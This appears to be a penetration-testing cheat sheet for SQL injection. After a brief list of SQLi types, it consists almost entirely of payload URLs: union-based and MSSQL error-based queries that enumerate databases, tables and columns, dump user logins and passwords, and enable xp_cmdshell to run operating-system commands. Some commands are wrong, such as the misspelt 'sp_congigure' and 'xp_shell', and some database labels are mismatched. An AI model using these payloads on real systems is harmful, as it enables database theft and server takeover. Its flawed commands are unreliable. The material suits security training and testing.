SQL Injection
SQL injection
It is an attack in which an attacker inserts untrusted data in the application that results in revealing sensitive information of the database.
SQL Injection (SQLi) is a code injection attack where an attacker manipulates the data being sent to the server to execute malicious SQL statements to control a web application’s database server, thereby accessing, modifying and deleting unauthorized data. This attack is mainly used to take over database servers.
In-band SQLi (Classic SQLi)
Error-based SQLi
Union-based SQLi
Inferential SQLi (Blind SQLi)
Boolean-based (content-based) Blind SQLi
Time-based Blind SQLi
Out-of-band SQLi
Where to find
How to exploit
SQLI tricks
Simple test
Adding a simpe quote '
Example: http://vulnerable-website.com/Less-1/?id=5'
Sorting columns to find maximum column
http://vulnerable-website.com/Less-1/?id=-1 order by 1
http://vulnerable-website.com/Less-1/?id=-1 order by 2
http://vulnerable-website.com/Less-1/?id=-1 order by 3
(until it stop returning errors)
Finding what column is injectable
mysql http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, 3
(using the same amount of columns you got on the previous step)
postgresql http://vulnerable-website.com/Less-1/?id=-1 union select NULL, NULL, NULL
(using the same amount of columns you got on the previous step)
one of the columns will be printed with the respective number
Finding version
http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, version()
mysql http://vulnerable-website.com/Less-1/?id=-1 union select NULL, NULL, version()
Finding database name
http://vulnerable-website.com/Less-1/?id=-1 union select 1,2, database()
http://vulnerable-website.com/Less-1/?id=-1 union select NULL,NULL, database()
Finding usernames logged in
http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, current_user()
Finding databases
http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, schema_name from information_schema.schemata
http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, datname from pg_database
Finding table names from a database
http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, table_name from information_schema.tables where table_schema="database_name"
http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, tablename from pg_tables where table_catalog="database_name"
Finding column names from a table
http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_schema="database_name" and table_name="tablename"
http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_catalog="database_name" and table_name="tablename"
http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, login from users;
http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, password from users;
in one query
http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, concat(login,':',password) from users;
mysql http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, login||':'||password from users;
Current user
http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(user_name() as varchar(4096)))--
DBMS version
http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(@@version as varchar(4096)))--
Database name
http://vulnerable-website.com/Less-1/?id=-1 or db_name(0)=0 --
Tables from a database
http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U')--
http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U' AND name NOT IN ('previouslyFoundTable',...))--
Columns within a table
http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename')--
remember to change dbname and tablename accordingly with the given situation after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample
http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename' AND dbname..syscolumns.name NOT IN('previously found column name', ...))--
Actual data
http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename)--
after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample
http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename AND name NOT IN('previously found row data'))--
Shell commands
EXEC master..xp_cmdshell <command>
you need yo be 'sa' user
Enabling shell commands
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_congigure 'xp_shell', 1; RECONFIGURE;
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